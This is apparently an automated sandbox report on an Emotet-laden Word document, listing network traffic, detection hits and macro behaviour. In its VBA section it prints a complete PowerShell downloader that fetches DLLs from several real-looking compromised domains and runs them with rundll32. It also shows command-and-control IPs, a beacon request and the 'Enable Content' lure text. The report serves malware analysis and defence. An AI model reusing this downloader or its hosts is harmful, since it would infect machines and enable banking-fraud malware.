Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://osi.office.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://otelrules.azureedge.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://outlook.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://outlook.office365.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://roaming.edog.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	String found in binary or memory: https://staviancjs.com/wp-forum/QOm4n2/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000008.00000002.309740186.000001C419413000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000008.00000003.309189585.000001C419456000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000008.00000003.309189585.000001C419456000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000008.00000003.287038973.000001C419431000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000008.00000002.309792794.000001C41943A000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://tasks.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://www.odwebp.svc.ms
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	String found in binary or memory: https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/

Source: unknown

DNS traffic detected: queries for: thepilatesstudionj.com

Source: global traffic	HTTP traffic detected: GET /xlgRAUoKyrAaNnNNtTN HTTP/1.1Cookie: ZY=3bqR+TDsaw4ISdWheUyZ7+BfZlZm+32bzB+7wtiUWoH9C2gCIryiUl5WAuzJJ5ea6QzyqPEJC6DkwnmwNMb1gk+5A5+cWtbxEcALOy2S4QOQeBpgllr+1+8qRlVVSCJHihVyjR1uqZYCjlCPhmlt/vgDWvzkZJKX+QeR1swdnldI9zpydTmZKXkHoCqWfX3Fqy4OkZd9TUhFwIMLga3/5XfS1ABqmPK7bE/sm3JzQyUjLj4a0GGjw2XmDsZNEYJSFzVD0W/PKResRLsLDUuiRrmZhCw7olwx4jd6UWHq9IxVQWqR2IuMHo90DW/gDju7JXcqzlJaEv0=Host: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wp-content/oAx5UoQmIX3cbw/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: thepilatesstudionj.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xcyav/F9le301G89W0s2g4jLO5/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: alfaofarms.comConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 22 Nov 2021 10:03:15 GMTContent-Type: text/htmlContent-Length: 162Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 168.197.250.14
Source: unknown	TCP traffic detected without corresponding DNS query: 168.197.250.14
Source: unknown	TCP traffic detected without corresponding DNS query: 168.197.250.14
Source: unknown	TCP traffic detected without corresponding DNS query: 45.79.33.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.79.33.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.79.33.48

Source: unknown

HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.5:49794 version: TLS 1.2

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615A5A30 GetOpenClipboardWindow,CloseClipboard,GetMenuCheckMarkDimensions,IsSystemResumeAutomatic,

14_2_615A5A30

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 21.2.rundll32.exe.30146b8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.30146b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.416130132.0000000003025000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.456337170.0000000000775000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.377988081.0000000000475000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to pcenew tms Document Page1 of 1 Owords It? O Type h
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED Prenewmg os not available for protected documents You have to press "ENABLE
Source: Screenshot number: 4	Screenshot OCR: protected documents You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pcenew tms D
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to pcenew tms Document Page1 of 1 Owords It? O Type here to search m % -
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this docum:?i Shortcut Tools Usethese butt
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. C, Previewing is not available for protected documents. O You have to press
Source: Screenshot number: 8	Screenshot OCR: protected documents. O You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview t
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this docum:?i Shortcut Tools Usethese buttons to quickly custo
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Powershell drops PE file

Show sources

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\13791789.dll

Jump to dropped file

Document contains an embedded VBA macro which may execute processes

Show sources

Source: VBA code instrumentation	OLE, VBA macro: Module bvkaeiku2ncoi2uho3ihdes, Function dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf, API IWshShell3.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0:Integer)			Name: dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: JbxHook_Run_2__ob = jbxthis.Run(jbxparam0, jbxparam1)

Source: 1711.doc	OLE indicator application name: unknown
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE indicator application name: unknown
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr	OLE indicator application name: unknown

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046EE760	5_2_046EE760
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046ECF60	5_2_046ECF60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046ECF70	5_2_046ECF70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615A5730	14_2_615A5730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615A6620	14_2_615A6620
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BA1F0	14_2_615BA1F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615D3074	14_2_615D3074
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BA29D	14_2_615BA29D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615AF700	14_2_615AF700
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615C3780	14_2_615C3780
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BA60F	14_2_615BA60F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615CC6FE	14_2_615CC6FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615D1929	14_2_615D1929
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BA8B9	14_2_615BA8B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BAB80	14_2_615BAB80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BDA2D	14_2_615BDA2D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615A2A80	14_2_615A2A80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BDC5D	14_2_615BDC5D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615B7C47	14_2_615B7C47
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615B1CD0	14_2_615B1CD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BAE3B	14_2_615BAE3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615A5EE0	14_2_615A5EE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067441E	16_2_0067441E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068CAA8	16_2_0068CAA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006843B3	16_2_006843B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068406E	16_2_0068406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00671C76	16_2_00671C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00672A46	16_2_00672A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00673845	16_2_00673845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00672043	16_2_00672043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068E441	16_2_0068E441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067A048	16_2_0067A048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00679A57	16_2_00679A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00672654	16_2_00672654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067EC27	16_2_0067EC27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067D223	16_2_0067D223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00679E22	16_2_00679E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00685220	16_2_00685220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00691A3C	16_2_00691A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068F83F	16_2_0068F83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00674C00	16_2_00674C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00671A0A	16_2_00671A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067220A	16_2_0067220A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00678C09	16_2_00678C09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067F41F	16_2_0067F41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00681C10	16_2_00681C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067E21C	16_2_0067E21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068AEEB	16_2_0068AEEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068ECE3	16_2_0068ECE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006730F6	16_2_006730F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068A8F0	16_2_0068A8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068DEF4	16_2_0068DEF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068BEC9	16_2_0068BEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00680ADE	16_2_00680ADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006908D1	16_2_006908D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00687ED1	16_2_00687ED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068CCD4	16_2_0068CCD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006844AA	16_2_006844AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067FEA0	16_2_0067FEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067DAAE	16_2_0067DAAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006878A5	16_2_006878A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068D6A7	16_2_0068D6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006890BA	16_2_006890BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00675AB2	16_2_00675AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006898BD	16_2_006898BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00684E8A	16_2_00684E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068748A	16_2_0068748A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00677283	16_2_00677283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067CC8D	16_2_0067CC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00690687	16_2_00690687
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067AC95	16_2_0067AC95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068AC9B	16_2_0068AC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00673C91	16_2_00673C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068D091	16_2_0068D091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068056A	16_2_0068056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00681F6B	16_2_00681F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068577E	16_2_0068577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00673345	16_2_00673345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068F14D	16_2_0068F14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00691343	16_2_00691343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00673F5C	16_2_00673F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067C158	16_2_0067C158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0069292B	16_2_0069292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00676B25	16_2_00676B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00675923	16_2_00675923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00690B34	16_2_00690B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00673502	16_2_00673502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00672309	16_2_00672309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068FD10	16_2_0068FD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067251C	16_2_0067251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068BFE8	16_2_0068BFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006755E8	16_2_006755E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006903F1	16_2_006903F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067C5FE	16_2_0067C5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00676FC4	16_2_00676FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006925C3	16_2_006925C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067A3DF	16_2_0067A3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00684BAA	16_2_00684BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00689DA1	16_2_00689DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00682FA2	16_2_00682FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067BFB6	16_2_0067BFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00687BB2	16_2_00687BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068B1B5	16_2_0068B1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00679384	16_2_00679384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00684D8D	16_2_00684D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067758F	16_2_0067758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00674F8E	16_2_00674F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068D99A	16_2_0068D99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067FD91	16_2_0067FD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00691193	16_2_00691193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068B397	16_2_0068B397

Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\~DFE2F261E3909AA4D4.TMP, type: DROPPED

Matched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: String function: 615B5BE0 appears 49 times

Source: 1711.doc	OLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module bvkaeiku2ncoi2uho3ihdes, Function Document_Open	Name: Document_Open
